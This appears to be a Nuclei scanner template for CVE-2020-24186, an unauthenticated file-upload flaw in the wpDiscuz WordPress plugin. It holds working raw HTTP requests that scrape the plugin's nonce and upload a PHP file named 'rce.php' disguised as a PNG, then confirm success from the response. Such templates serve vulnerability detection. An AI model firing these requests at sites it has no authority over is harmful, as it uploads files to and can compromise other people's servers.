id: CVE-2020-24186 info: name: Unauthenticated File upload wpDiscuz WordPress plugin RCE author: Ganofins severity: critical description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md tags: cve,cve2020,wordpress,wp-plugin,rce,upload classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.00 cve-id: CVE-2020-24186 cwe-id: CWE-434 requests: - raw: - | GET /?p=1 HTTP/1.1 Host: {{Hostname}} Accept: */* - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak Origin: {{BaseURL}} Referer: {{BaseURL}} ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="action" wmuUploadFiles ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="wmu_nonce" {{wmuSecurity}} ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="wmuAttachmentsData" undefined ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php" Content-Type: image/png {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}} ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="postId" 1 ------WebKitFormBoundary88AhjLimsDMHU1Ak-- extractors: - type: regex part: body internal: true name: wmuSecurity group: 1 regex: - 'wmuSecurity":"([a-z0-9]+)' - type: regex part: body group: 1 regex: - '"url":"([a-z:\\/0-9-.]+)"' matchers-condition: and matchers: - type: status status: - 200 - type: word words: - 'success":true' - 'fullname' - 'shortname' - 'url' condition: and part: body